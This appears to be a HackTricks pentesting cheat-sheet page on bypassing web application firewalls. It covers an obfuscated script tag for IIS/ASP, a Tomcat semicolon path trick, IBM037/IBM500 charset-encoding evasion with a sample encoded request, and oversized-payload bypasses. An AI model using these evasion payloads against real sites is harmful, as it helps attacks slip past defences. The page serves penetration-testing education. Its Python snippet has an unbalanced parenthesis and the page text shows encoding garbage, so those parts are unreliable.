HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
WAF Bypass
Support HackTricks and get benefits!
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
โ€‹
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
โ€‹
# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037
โ€‹
##Python code
import urllib
s = 'payload'
print(urllib.quote_plus(s.encode("IBM037"))
โ€‹
## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61
โ€‹
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
โ€‹
It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
Support HackTricks and get benefits!
Copy link